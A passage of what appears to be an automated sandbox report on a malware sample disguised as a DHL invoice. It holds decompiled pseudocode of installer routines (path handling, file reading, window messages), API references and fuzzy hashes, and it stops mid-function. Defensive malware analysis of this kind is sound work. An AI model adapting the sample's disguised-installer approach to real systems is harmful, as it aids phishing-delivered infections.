                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsaE104.tmp\System.dll
                                                                            • API String ID: 2667972263-1467588977
                                                                            • Opcode ID: 21bf38eaf766e30db3ad4f67b39d13bf90a53ba7524260bc4dffed712f826359
                                                                            • Instruction ID: 23d93ea21af668beabbcb9178b0b7634ed911faf56d8c64a437eebf92f001ab7
                                                                            • Opcode Fuzzy Hash: 21bf38eaf766e30db3ad4f67b39d13bf90a53ba7524260bc4dffed712f826359
                                                                            • Instruction Fuzzy Hash: B2310471508351ABD310AF65CD48E1FBBE8AF89714F100A3EF5A1772D2C37899018BAA
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 94%
                                                                            			E00406D3D(WCHAR* _a4) {
                                                                            				signed short _t5;
                                                                            				signed int _t8;
                                                                            				signed int _t9;
                                                                            				signed short _t18;
                                                                            				signed short _t20;
                                                                            				signed int _t21;
                                                                            				signed short _t22;
                                                                            				WCHAR* _t23;
                                                                            				WCHAR* _t24;
                                                                            				void* _t25;
                                                                            				WCHAR* _t26;
                                                                            
                                                                            				_t24 = _a4;
                                                                            				_t22 = 0x5c;
                                                                            				_t5 =  *_t24 & 0x0000ffff;
                                                                            				_t20 = _t5;
                                                                            				if(_t5 == _t22) {
                                                                            					_t20 = _t22;
                                                                            					if(_t24[1] == _t22 && _t24[2] == 0x3f && _t24[3] == _t22) {
                                                                            						_t24 =  &(_t24[4]);
                                                                            						_t20 =  *_t24 & 0x0000ffff;
                                                                            					}
                                                                            				}
                                                                            				_t18 = _t20 & 0x0000ffff;
                                                                            				if(_t20 != 0) {
                                                                            					_t18 = _t20 & 0x0000ffff;
                                                                            					if(E00406E03(_t24) != 0) {
                                                                            						_t24 =  &(_t24[2]);
                                                                            						_t18 =  *_t24 & 0x0000ffff;
                                                                            					}
                                                                            				}
                                                                            				_t26 = _t24;
                                                                            				_t23 = _t24;
                                                                            				if(_t18 == 0) {
                                                                            					L14:
                                                                            					 *_t23 = 0;
                                                                            					_t25 = 0x5c;
                                                                            					while(1) {
                                                                            						_push(_t23);
                                                                            						_push(_t26);
                                                                            						_t23 = CharPrevW();
                                                                            						_t8 =  *_t23 & 0x0000ffff;
                                                                            						if(_t8 != 0x20 && _t8 != _t25) {
                                                                            							break;
                                                                            						}
                                                                            						_t8 = 0;
                                                                            						 *_t23 = 0;
                                                                            						if(_t26 < _t23) {
                                                                            							continue;
                                                                            						}
                                                                            						break;
                                                                            					}
                                                                            					return _t8;
                                                                            				} else {
                                                                            					_t9 = _t18 & 0x0000ffff;
                                                                            					do {
                                                                            						if(_t9 > 0x1f &&  *((short*)(E004065F6(L"*?|<>/\":", _t9))) == 0) {
                                                                            							E004066B4(_t23, _t24, CharNextW(_t24) - _t24 >> 1);
                                                                            							_t23 = CharNextW(_t23);
                                                                            						}
                                                                            						_t24 = CharNextW(_t24);
                                                                            						_t21 =  *_t24 & 0x0000ffff;
                                                                            						_t9 = _t21;
                                                                            					} while (_t21 != 0);
                                                                            					goto L14;
                                                                            				}
                                                                            			}














                                                                            0x00406d40
                                                                            0x00406d47
                                                                            0x00406d48
                                                                            0x00406d4b
                                                                            0x00406d50
                                                                            0x00406d52
                                                                            0x00406d58
                                                                            0x00406d67
                                                                            0x00406d6a
                                                                            0x00406d6a
                                                                            0x00406d58
                                                                            0x00406d6d
                                                                            0x00406d73
                                                                            0x00406d76
                                                                            0x00406d80
                                                                            0x00406d82
                                                                            0x00406d85
                                                                            0x00406d85
                                                                            0x00406d80
                                                                            0x00406d88
                                                                            0x00406d8a
                                                                            0x00406d8f
                                                                            0x00406dd4
                                                                            0x00406dd8
                                                                            0x00406ddb
                                                                            0x00406ddc
                                                                            0x00406ddc
                                                                            0x00406ddd
                                                                            0x00406de4
                                                                            0x00406de6
                                                                            0x00406dec
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406df3
                                                                            0x00406df5
                                                                            0x00406dfa
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406dfa
                                                                            0x00406e00
                                                                            0x00406d91
                                                                            0x00406d91
                                                                            0x00406d9a
                                                                            0x00406d9e
                                                                            0x00406dbb
                                                                            0x00406dc3
                                                                            0x00406dc3
                                                                            0x00406dc8
                                                                            0x00406dca
                                                                            0x00406dcd
                                                                            0x00406dcf
                                                                            0x00000000
                                                                            0x00406d9a

                                                                            APIs
                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,761B3420,004039C2), ref: 00406DB2
                                                                            • CharNextW.USER32(?,?,?,00000000), ref: 00406DC1
                                                                            • CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,761B3420,004039C2), ref: 00406DC6
                                                                            • CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,761B3420,004039C2), ref: 00406DDE
                                                                            Strings
                                                                            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406D44
                                                                            • *?|<>/":, xrefs: 00406DA1
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00406D3D, 00406D3F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: Char$Next$Prev
                                                                            • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
                                                                            • API String ID: 589700163-2188270913
                                                                            • Opcode ID: 0b6213c0c1622fb53aee38363b717c73aa2e600d62468f8e3aca7b6a41b68933
                                                                            • Instruction ID: 9b03febb742ef4485f2caa0616bf8b5dba6ff04d2a2b11022b5674ddd7f14081
                                                                            • Opcode Fuzzy Hash: 0b6213c0c1622fb53aee38363b717c73aa2e600d62468f8e3aca7b6a41b68933
                                                                            • Instruction Fuzzy Hash: 4E110211B0022566DA306B2A9C4097B72E8DFA9761746443BF9C6A32C0F77D8CA1D2B8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E0040575B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                            				struct tagLOGBRUSH _v16;
                                                                            				void* _t38;
                                                                            				signed char _t40;
                                                                            				signed char _t42;
                                                                            				long _t51;
                                                                            				long _t52;
                                                                            				long* _t55;
                                                                            
                                                                            				if(_a4 + 0xfffffecd > 5) {
                                                                            					L18:
                                                                            					_t38 = 0;
                                                                            				} else {
                                                                            					_t55 = GetWindowLongW(_a12, 0xffffffeb);
                                                                            					if(_t55 == 0 || _t55[2] > 1 || _t55[4] > 2) {
                                                                            						goto L18;
                                                                            					} else {
                                                                            						_t40 = _t55[5];
                                                                            						if((_t40 & 0xffffffe0) != 0) {
                                                                            							goto L18;
                                                                            						} else {
                                                                            							_t51 =  *_t55;
                                                                            							if((_t40 & 0x00000002) != 0) {
                                                                            								_t51 = GetSysColor(_t51);
                                                                            								_t40 = _t55[5];
                                                                            							}
                                                                            							if((_t40 & 0x00000001) != 0) {
                                                                            								SetTextColor(_a8, _t51);
                                                                            							}
                                                                            							SetBkMode(_a8, _t55[4]);
                                                                            							_t42 = _t55[5];
                                                                            							_t52 = _t55[1];
                                                                            							_v16.lbColor = _t52;
                                                                            							if((_t42 & 0x00000008) != 0) {
                                                                            								_t52 = GetSysColor(_t52);
                                                                            								_t42 = _t55[5];
                                                                            								_v16.lbColor = _t52;
                                                                            							}
                                                                            							if((_t42 & 0x00000004) != 0) {
                                                                            								SetBkColor(_a8, _t52);
                                                                            								_t42 = _t55[5];
                                                                            							}
                                                                            							if((_t42 & 0x00000010) != 0) {
                                                                            								_v16.lbStyle = _t55[2];
                                                                            								if(_t55[3] != 0) {
                                                                            									DeleteObject(_t55[3]);
                                                                            								}
                                                                            								_t55[3] = CreateBrushIndirect( &_v16);
                                                                            							}
                                                                            							_t38 = _t55[3];
                                                                            						}
                                                                            					}
                                                                            				}
                                                                            				return _t38;
                                                                            			}










                                                                            0x0040576d
                                                                            0x0040582e
                                                                            0x0040582e
                                                                            0x00405773
                                                                            0x0040577e
                                                                            0x00405782
                                                                            0x00000000
                                                                            0x0040579c
                                                                            0x0040579c
                                                                            0x004057a4
                                                                            0x00000000
                                                                            0x004057aa
                                                                            0x004057aa
                                                                            0x004057ae
                                                                            0x004057b7
                                                                            0x004057b9
                                                                            0x004057b9
                                                                            0x004057be
                                                                            0x004057c4
                                                                            0x004057c4
                                                                            0x004057d0
                                                                            0x004057d6
                                                                            0x004057d9
                                                                            0x004057dc
                                                                            0x004057e1
                                                                            0x004057ea
                                                                            0x004057ec
                                                                            0x004057ef
                                                                            0x004057ef
                                                                            0x004057f4
                                                                            0x004057fa
                                                                            0x00405800
                                                                            0x00405800
                                                                            0x00405805
                                                                            0x0040580e
                                                                            0x00405811
                                                                            0x00405816
                                                                            0x00405816
                                                                            0x00405826
                                                                            0x00405826
                                                                            0x00405829
                                                                            0x00405829
                                                                            0x004057a4
                                                                            0x00405782
                                                                            0x00405832

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                            • String ID:
                                                                            • API String ID: 2320649405-0
                                                                            • Opcode ID: 884efe4836094bb20a6f18f16c634fbe29c57d0ac42d5c945227a46e33033bd0
                                                                            • Instruction ID: d6878141ad4b6a1f495ba237af706d2ee8e98f75713b616aff0e98366caa8665
                                                                            • Opcode Fuzzy Hash: 884efe4836094bb20a6f18f16c634fbe29c57d0ac42d5c945227a46e33033bd0
                                                                            • Instruction Fuzzy Hash: 64210775600B059FDB34AF28E94895B7BF8EF05710700CA3AE896A27A1D735EC14CF58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 90%
                                                                            			E0040291D(void* __edi, void* __esi, signed int __ebp, void* _a4, void* _a8, void* _a12, char _a16, signed int _a20, long _a24, void* _a28, long _a32, intOrPtr _a36, void* _a48, intOrPtr _a52, void* _a56, signed int _a64, intOrPtr _a68, short _a72, int _a76) {
                                                                            				signed int _t61;
                                                                            				long _t63;
                                                                            				void* _t73;
                                                                            
                                                                            				_t63 = 2;
                                                                            				_a20 = __ebp;
                                                                            				_a32 = _t63;
                                                                            				_t73 = E00403002(_t63) - 1;
                                                                            				if(_t73 < 0) {
                                                                            					_t61 = _a16;
                                                                            					goto L33;
                                                                            				} else {
                                                                            					__ecx = 0x3ff;
                                                                            					_a24 = __eax;
                                                                            					if( *__edi == __bp) {
                                                                            						L25:
                                                                            						__eax = _a20;
                                                                            						__ecx = 0;
                                                                            						__ebx = 0;
                                                                            						 *((short*)(__esi + _a20 * 2)) = __cx;
                                                                            						_t61 = 0 | _t73 == 0x00000000;
                                                                            						L33:
                                                                            						 *0x435ac8 =  *0x435ac8 + _t61;
                                                                            					} else {
                                                                            						_a64 = __ebp;
                                                                            						__ecx = E00406C25(__edi);
                                                                            						_a24 = __ecx;
                                                                            						if(_a20 > __ebp) {
                                                                            							_a68 = 0xd;
                                                                            							__edi = __ebp;
                                                                            							do {
                                                                            								if(_a36 != 0x39) {
                                                                            									if(_a52 != __ebp || __edi != 0) {
                                                                            										L18:
                                                                            										__eax =  &_a72;
                                                                            										if(E00406948(__ecx, __ecx,  &_a72, 2) == 0) {
                                                                            											goto L25;
                                                                            										} else {
                                                                            											goto L19;
                                                                            										}
                                                                            									} else {
                                                                            										if(E00406484(__ecx, __ebp) < 0) {
                                                                            											goto L25;
                                                                            										} else {
                                                                            											__ecx = _a28;
                                                                            											goto L18;
                                                                            										}
                                                                            									}
                                                                            								} else {
                                                                            									_push(__ebp);
                                                                            									__eax =  &_a76;
                                                                            									_push( &_a76);
                                                                            									__eax = 2;
                                                                            									 &_a76 - _a52 =  &_a16;
                                                                            									if(ReadFile(__ecx,  &_a16,  &_a76 - _a52, ??, ??) == 0) {
                                                                            										goto L25;
                                                                            									} else {
                                                                            										__ecx = _a76;
                                                                            										_a32 = __ecx;
                                                                            										if(__ecx == 0) {
                                                                            											goto L25;
                                                                            										} else {
                                                                            											__eax = _a16 & 0x000000ff;
                                                                            											_a72 = _a16 & 0x000000ff;
                                                                            											if(_a52 != __ebp) {
                                                                            												L31:
                                                                            												__ax & 0x0000ffff = E0040661F(__esi, __ax & 0x0000ffff);
                                                                            											} else {
                                                                            												 &_a72 =  &_a16;
                                                                            												if(MultiByteToWideChar(__ebp, 8,  &_a16, __ecx,  &_a72, __ebx) != 0) {
                                                                            													L19:
                                                                            													__ecx = _a32;
                                                                            													__eax = _a72;
                                                                            												} else {
                                                                            													__ecx = _a32;
                                                                            													__edx = __ecx;
                                                                            													__edx =  ~__ecx;
                                                                            													while(1) {
                                                                            														_t22 =  &_a76;
                                                                            														 *_t22 = _a76 - 1;
                                                                            														__eax = 0xfffd;
                                                                            														_a72 = 0xfffd;
                                                                            														if( *_t22 == 0) {
                                                                            															goto L20;
                                                                            														}
                                                                            														__ecx = __ecx - 1;
                                                                            														__edx = __edx + 1;
                                                                            														_a32 = __ecx;
                                                                            														 *(__esp + 0x60) = __edx;
                                                                            														SetFilePointer(_a28, __edx, __ebp, __ebx) =  &_a72;
                                                                            														__eax =  &_a16;
                                                                            														__eax = MultiByteToWideChar(__ebp, 8,  &_a16, _a76,  &_a72, __ebx);
                                                                            														__ecx = _a32;
                                                                            														__edx =  *(__esp + 0x50);
                                                                            														if(__eax == 0) {
                                                                            															continue;
                                                                            														} else {
                                                                            															goto L19;
                                                                            														}
                                                                            														goto L20;
                                                                            													}
                                                                            												}
                                                                            												L20:
                                                                            												if(_a52 != __ebp) {
                                                                            													goto L31;
                                                                            												} else {
                                                                            													__edx = 0xd;
                                                                            													__edx = 0xa;
                                                                            													if(_a64 == __dx || _a64 == __dx) {
                                                                            														if(_a64 == __ax || __ax != _a68 && __ax != __dx) {
                                                                            															__eax = SetFilePointer(_a28, __ecx, __ebp, __ebx);
                                                                            														} else {
                                                                            															 *(__esi + __edi * 2) = __ax;
                                                                            															_a20 = __edi;
                                                                            														}
                                                                            														goto L25;
                                                                            													} else {
                                                                            														 *(__esi + __edi * 2) = __ax;
                                                                            														__edi = __edi + 1;
                                                                            														__eax = __ax & 0x0000ffff;
                                                                            														_a20 = __edi;
                                                                            														_a64 = __ax & 0x0000ffff;
                                                                            														if(__ax == 0) {
                                                                            															goto L25;
                                                                            														} else {
                                                                            															goto L24;
                                                                            														}
                                                                            													}
                                                                            												}
                                                                            											}
                                                                            										}
                                                                            									}
                                                                            								}
                                                                            								goto L34;
                                                                            								L24:
                                                                            								__ecx = _a28;
                                                                            							} while (__edi < _a24);
                                                                            						}
                                                                            						goto L25;
                                                                            					}
                                                                            				}
                                                                            				L34:
                                                                            				return 0;
                                                                            			}






                                                                            0x0040291f
                                                                            0x00402921
                                                                            0x00402925
                                                                            0x00402932
                                                                            0x00402934
                                                                            0x00402ea1
                                                                            0x00000000
                                                                            0x0040293a
                                                                            0x0040293a
                                                                            0x00402944
                                                                            0x0040294b
                                                                            0x00402aa2
                                                                            0x00402aa2
                                                                            0x00402aa6
                                                                            0x00402aa8
                                                                            0x00402aac
                                                                            0x00401a10
                                                                            0x00402ea5
                                                                            0x00402ea5
                                                                            0x00402951
                                                                            0x00402952
                                                                            0x0040295b
                                                                            0x0040295d
                                                                            0x00402965
                                                                            0x0040296b
                                                                            0x00402973
                                                                            0x00402975
                                                                            0x0040297a
                                                                            0x00402a37
                                                                            0x00402a4c
                                                                            0x00402a4e
                                                                            0x00402a5b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00402a3d
                                                                            0x00402a46
                                                                            0x00000000
                                                                            0x00402a48
                                                                            0x00402a48
                                                                            0x00000000
                                                                            0x00402a48
                                                                            0x00402a46
                                                                            0x00402980
                                                                            0x00402980
                                                                            0x00402981
                                                                            0x00402985
                                                                            0x00402988
                                                                            0x0040298e
                                                                            0x0040299c
                                                                            0x00000000
                                                                            0x004029a2
                                                                            0x004029a2
                                                                            0x004029a6
                                                                            0x004029ac
                                                                            0x00000000
                                                                            0x004029b2
                                                                            0x004029b2
                                                                            0x004029b7
                                                                            0x004029bf
                                                                            0x00402ae4
                                                                            0x00402ae9
                                                                            0x004029c5
                                                                            0x004029cc
                                                                            0x004029dc
                                                                            0x00402a5d
                                                                            0x00402a5d
                                                                            0x00402a61
                                                                            0x004029de
                                                                            0x004029de
                                                                            0x004029e2
                                                                            0x004029e4
                                                                            0x004029e6
                                                                            0x004029e6
                                                                            0x004029e6
                                                                            0x004029eb
                                                                            0x004029f0
                                                                            0x004029f4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004029f7
                                                                            0x004029f8
                                                                            0x004029ff
                                                                            0x00402a03
                                                                            0x00402a0e
                                                                            0x00402a17
                                                                            0x00402a1f
                                                                            0x00402a25
                                                                            0x00402a29
                                                                            0x00402a2f
                                                                            0x00000000
                                                                            0x00402a31
                                                                            0x00000000
                                                                            0x00402a31
                                                                            0x00000000
                                                                            0x00402a2f
                                                                            0x004029e6
                                                                            0x00402a65
                                                                            0x00402a69
                                                                            0x00000000
                                                                            0x00402a6b
                                                                            0x00402a6d
                                                                            0x00402a75
                                                                            0x00402a76
                                                                            0x00402aba
                                                                            0x00402adc
                                                                            0x00402ac8
                                                                            0x00402ac8
                                                                            0x00402acd
                                                                            0x00402acd
                                                                            0x00000000
                                                                            0x00402a7f
                                                                            0x00402a7f
                                                                            0x00402a83
                                                                            0x00402a84
                                                                            0x00402a87
                                                                            0x00402a8b
                                                                            0x00402a92
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00402a92
                                                                            0x00402a76
                                                                            0x00402a69
                                                                            0x004029bf
                                                                            0x004029ac
                                                                            0x0040299c
                                                                            0x00000000
                                                                            0x00402a94
                                                                            0x00402a94
                                                                            0x00402a98
                                                                            0x00402975
                                                                            0x00000000
                                                                            0x00402965
                                                                            0x0040294b
                                                                            0x00402eab
                                                                            0x00402eb7

                                                                            APIs
                                                                            • ReadFile.KERNEL32(00000000,?,?,?), ref: 00402994
                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004029D4
                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402A07
                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,00000001,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402A1F
                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,00000000,?,00000002), ref: 00402ADC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: File$ByteCharMultiPointerWide$Read
                                                                            • String ID: 9
                                                                            • API String ID: 1439708474-2366072709
                                                                            • Opcode ID: 9f93ca41379e5358701e9762d9d73a54771f02cb738d955fe51c94385f5bda32
                                                                            • Instruction ID: c0364eb4a24137c8a00bba018ae5694ccc63d4c43f2b92d4ab62ccb683855c39
                                                                            • Opcode Fuzzy Hash: 9f93ca41379e5358701e9762d9d73a54771f02cb738d955fe51c94385f5bda32
                                                                            • Instruction Fuzzy Hash: FD513B71618301AFD724DF11CA48A2BB7E8BFD5304F00483FF985A62D1DBB9D9458B66
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E004056DA(struct HWND__* _a4, intOrPtr _a8) {
                                                                            				long _v8;
                                                                            				signed char _v12;
                                                                            				unsigned int _v16;
                                                                            				void* _v20;
                                                                            				intOrPtr _v24;
                                                                            				long _v56;
                                                                            				void* _v60;
                                                                            				long _t18;
                                                                            				unsigned int _t22;
                                                                            				signed int _t28;
                                                                            
                                                                            				_t18 = SendMessageW(_a4, 0x110a, 9, 0);
                                                                            				if(_a8 == 0) {
                                                                            					L4:
                                                                            					_v56 = _t18;
                                                                            					_v60 = 4;
                                                                            					SendMessageW(_a4, 0x113e, 0,  &_v60);
                                                                            					return _v24;
                                                                            				}
                                                                            				_t22 = GetMessagePos();
                                                                            				_v16 = _t22 >> 0x10;
                                                                            				_v20 = _t22;
                                                                            				ScreenToClient(_a4,  &_v20);
                                                                            				_t28 = SendMessageW(_a4, 0x1111, 0,  &_v20);
                                                                            				if((_v12 & 0x00000066) != 0) {
                                                                            					_t18 = _v8;
                                                                            					goto L4;
                                                                            				}
                                                                            				return _t28 | 0xffffffff;
                                                                            			}













                                                                            0x004056f3
                                                                            0x004056f9
                                                                            0x00405739
                                                                            0x00405739
                                                                            0x0040574a
                                                                            0x00405751
                                                                            0x00000000
                                                                            0x00405753
                                                                            0x004056fb
                                                                            0x00405708
                                                                            0x00405712
                                                                            0x00405715
                                                                            0x00405729
                                                                            0x0040572f
                                                                            0x00405736
                                                                            0x00000000
                                                                            0x00405736
                                                                            0x00000000

                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004056F3
                                                                            • GetMessagePos.USER32 ref: 004056FB
                                                                            • ScreenToClient.USER32(?,?), ref: 00405715
                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00405729
                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00405751
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: Message$Send$ClientScreen
                                                                            • String ID: f
                                                                            • API String ID: 41195575-1993550816
                                                                            • Opcode ID: 831e9add14996ca58957b6d0f39193948d4b40b41c3f38ee460bf659b5b9a320
                                                                            • Instruction ID: c2e7ed3a8a7ffde0c91d4cd6f33517ea70e65294e07f2b992d5a249d380e7f5b
                                                                            • Opcode Fuzzy Hash: 831e9add14996ca58957b6d0f39193948d4b40b41c3f38ee460bf659b5b9a320
                                                                            • Instruction Fuzzy Hash: 01014C7190020DBBEB119FA4CC45BEEBBB9EB44720F104226FA51B61E0D7B59A419F54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 55%
                                                                            			E00401FB8(struct HWND__* __edx, intOrPtr _a8, struct HWND__* _a24, intOrPtr _a36, signed char _a48) {
                                                                            				void* _v12;
                                                                            				int _t7;
                                                                            				intOrPtr _t13;
                                                                            				intOrPtr _t22;
                                                                            				signed char _t26;
                                                                            				struct HDC__* _t29;
                                                                            				void* _t35;
                                                                            
                                                                            				_t29 = GetDC(__edx);
                                                                            				_t7 = E00403002(2);
                                                                            				0x40d908->lfHeight =  ~(MulDiv(_t7, GetDeviceCaps(_t29, 0x5a), 0x48));
